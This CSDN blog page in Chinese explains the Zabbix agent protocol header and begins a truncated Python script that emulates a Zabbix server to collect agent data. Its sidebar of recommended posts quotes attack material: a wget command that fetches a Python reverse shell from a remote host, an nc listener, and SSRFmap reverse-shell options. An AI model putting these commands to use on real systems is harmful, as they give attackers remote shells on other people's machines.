伪造zabbix server与zabbix agent通信获取数据

最新推荐文章于 2023-07-03 10:48:57 发布
最新推荐文章于 2023-07-03 10:48:57 发布
阅读量1.1k 收藏 1
点赞数 1
分类专栏: 大数据 运维 文章标签: zabbix
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/coolleon2010/article/details/108528426
版权
本文介绍了Zabbix agent的被动和主动模式,并详细解析了Zabbix自定义TCP协议头信息,包括ZBXD标识、协议标志和数据长度。通过伪造通信,实现了Zabbix server与agent之间的数据交换。代码示例基于官方文档,但存在不足,如数据乱码和缓冲区处理。计划使用Java进行进一步实现。
摘要由CSDN通过智能技术生成

伪造zabbix server与zabbix agent通信获取数据


      项目中有需求,需要接收zabbix agent监控数据,但是不能集成zabbix server,所以研究了一下官网说明,写了个demo,供各位参考。
      本人非python专业开发,所以程序还有少许bug,但不影响获取数据,希望各位不吝赐教。
先说原理:

Zabbix agent分为两种模式:被动模式、主动模式
官网对应的地址:
https://www.zabbix.com/documentation/current/manual/appendix/items/activepassive
      被动模式是指Zabbix agent被动接受Zabbix server的轮询;
      主动模式是Zabbix agent主动将客户端监控信息发送给Zabbix server
Server的通信端口默认是10050
Agent的通信端口默认是10051(这些配置都在配置文件中,就不细说了)
zabbix通信头协议
说明:
-“ ZBXD”(4字节)。
-协议标志(1个字节)。0x01-Zabbix通信协议,0x02-压缩)。
-数据长度(4个字节)。1将被格式化为01/00/00/00(4字节,32位数字为Little-endian格式)。
zabbix的组件之间相互通信采用自定义的tcp协议,每次通信都会带上这个自定义头信息,所以各种语言的通信框架都不好使,要伪造就需要自己做定制。相关的官网说明地址:
https://www.zabbix.com/documentation/current/manual/appendix/protocols/header_datalen
建立连接之后,采用的json的方式传输数据,后面就比较简单了。
上代码

# encoding: utf-8
import json
import socket
import struct
import threading

data = json.dumps(
    {
   
        "response": "success",
        "data": [
            {
   
                "key": "log[/var/log/zabbix/zabbix_agentd.log]",
                "delay": 30,
                "lastlogsize": 0,
                "mtime": 0
            },
            {
   
                "key": "agent.version",
                "delay": 600,
                "lastlogsize": 0,
                "mtime": 0
            },
            {
   
                "key": "vfs.fs.size[/nono]",
                "delay": 600,
最低0.47元/天 解锁文章
SSRF扫描工具汇总记录
墨痕诉清风的博客
01-11 375
SSRFmap介绍SSRF经常被用来利用其他服务上的操作,这个框架旨在轻松地发现和利用这些服务。SSRFmap接受Burp请求文件作为输入,并接受一个参数进行模糊处理。输入参数由 burp suite 请求文本信息组成如下Win64;v=b3;q=0.7q=0.9帮助使用方法Python ssrfmap.py -r 抓到的请求包 -p 漏洞参数 -m redis -lhost=需要反弹到某个服务器的ip --lport=反弹到服务器的某个ip其中 -m 模块为选择利用的方式常用的有。
zabbix-Springboot模拟访问监控之环境准备
wujianqinjian
10-25 4389
<?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://m...
zabbix分布式系统监控---serveragentagentserver主动发送数据
lijua9794的博客
10-14 1281
一.实验环境: 主机名 角色 server1 zabbix-server server3 zabbix-agent 二.server主动向agent发送数据 1.安装软件包 [root@server3 ~]# yum install -y zabbix-sender 2.server3上创建监控项 3.serveragent发送数据 (1)命令行形式 [root@server3 ~]# zabbix_sender -z 172.25.13.1 -p 10051 -s "serve
Zabbix协议分析
weixin_30651273的博客
11-25 726
概述 Zabbix使用一种自定义的基于TCP的协议客户端进行通信 Zabbix <- TCP -> Zabbix agent 协议内容 <HEADER> - "ZBXD\x01" (5 bytes) <DATALEN> - data length (8 bytes). 1 will be formatted as 01/00/00/00/00/0...
docker-compose部署的zabbixagent通讯问题测试
最新发布
七月的狮子的博客
07-03 307
在弄清了127.0.0.1的问题后,可以开始解决之前使用docker-compose配置的zabbix监控容器无法和同一个宿主机上的agent通讯的奇怪问题。 zabbix_agent2的配置如下: LogType=console LogFile=/var/log/zabbix/zabbix_agentd.log LogFileSize=10 Server=127.0.0.1 ListenPort=10050 ServerActive=127.0.0.1 Hostname=Zabbix server Ena
Zabbix proxy-agent通讯机制及balanced router设计
开阔的生命
06-14 556
网络优化实战:静态路由在大数据中心的应用
案例分析部分提供了静态路由在大数据中心的实际应用故障处理经验,最后对静态路由的安全性、策略管理和性能监控进行了深入分析。本文旨在为大数据中心静态路由的优化实施提供综合性指南。 # 关键字 网络优化;...
IGMP v2报文网络监控系统:实时监控报警的终极解决方案
互联网组管理协议版本2(IGMP v2)报文在网络监控和组播通信中扮演关键角色,它支持高效的数据传输和管理,但同时需要考虑性能优化和安全性。本文首先介绍了IGMP v2报文的基础知识和功能,然后分析了其在网络监控...
Linux网络配置管理:掌握这些高级应用,让你游刃有余
[Linux网络配置管理:掌握这些高级应用,让你游刃有余](https://www.fosslinux.com/wp-content/uploads/2021/02/install-DHCP-server-on-Ubuntu.png) # 1. Linux网络基础知识回顾 Linux网络基础是理解复杂网络...
zabbix agent 跨网段连接 zabbix Server /zabbix web
nikolay的专栏
03-26 3263
一台Centos 7的服务器,单独部署在了一个独立网段(客户情况),为了方便(懒~不高兴单独部署 zabbix server),希望直接连接外网的zabbix server. 具体配置方法如下:(如何安装zabbix agent已经有很多文章介绍了~这边就过了) zabbix agent (客户端)配置: /etc/zabbix/zabbix_agentd.conf #将agent 设...
zabbix 监控自定义服务! 经过测试 已经成功了!
大众的专栏
10-30 7976
1.系统配置----主机--点击监控项- 新建项目(create item). 如图.. 类型选zabbix agent (被动型)  返回值是6  那就表示服务停止了.  把这个service 改成自定义的服务名称 2.现在系统配置-主机-触发器.还是新建一个trigger 点击  添加  再搜索  这就是刚才添加的监控项,图是截的之前的新建的
一次zabbix的渗透
weixin_30236595的博客
04-14 240
wget http://xxxxxxx:8888/back.py -O /tmp/1.py 写入python反弹马 反弹到vps python /tmp/back.py IP port 执行python反弹马 仪表盘执行命令 vps上监听nc -l -vv -p8080得交互shell 之后慢慢玩 转载于:https://www.cnblogs.com/ll...
Zabbix
dilreba的博客
02-06 346
像cpu、网络状态的某些指标之类的可以通过对主机加入默认模板即可检测;但如果想检测自己想看到的数据,比如想看磁盘的剩余容量、内存的剩余或者使用量等等,就需要自定义一个模板。然后关联到主机上进行监控。主要是。
python实现zabbix_sender的socket通信代码样例
weixin_30642305的博客
08-11 212
sk = socket.socket() sk.connect(self.ip_port) sk.settimeout(5) sk.sendall(b'ZBXD\x01') sk.sendall(b'Q\x00\x00\x00\x00\x00\x00\x00') sk.sendall(b'{"request":"sender ...
部署zabbix-agaent2验证
wfp___zzzz的博客
07-14 321
1.机器环境准备、2台zabbix客户端2.注意时间正确yum install ntpdate -y ntpdate -u ntp.aliyun.com3.时区的统一配置mv /etc/localtime{,.bak}ln -s /usr/share/zoneinfo/Asia/Shanghai /etc/localtime4.提前配置好zabbix的yum源,rpm -Uvh https://mirrors.aliyun.com/zabbix/zabbix/5.0/rhel/7/x86_64/zabbix
zabbix个性化监控之一】TCP连接数
linuxlsq的博客
07-04 4553
一、在被监控端上设置 主要命令: netstat -an | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}' 1 netstat -an | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}'
linux系统部署agent,Zabbix_agent部署
weixin_28866737的博客
04-30 807
参考文档:1.zabbix监控linux主机:一.环境Server:基于CentOS-7-x86_64-1511,已部署zabbix-3.0.1服务器端ServerIP: 192.168.11.252Agent:CentOS-6.4-x86_64AgentIP: 192.168.21.252,路由可达server二.软件获取Zabbix官网下载地址:当前最新LTS版本下载地址:三.准备1.ipta...
Zabbix攻击分析利用
weixin_43047908的博客
08-18 684
目录Zabbix简介Zabbix ServerZabbix ProxyZabbix AgentZabbix网络架构Zabbix Agent配置分析Server参数ServerActive参数StartAgents参数Zabbix漏洞复现CVE-2016-10134CVE-2017-2824CVE-2020-11800 Zabbix简介 Zabbix是一个支持实时监控数千台服务器、虚拟机和网络设备的企业级解决方案,客户覆盖许多大型企业。 Zabbix监控系统由以下几个组件部分构成: Zabbix Server
Zabbix 攻击面挖掘利用
st3pby的博客
12-23 866
Zabbix 攻击面挖掘利用
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值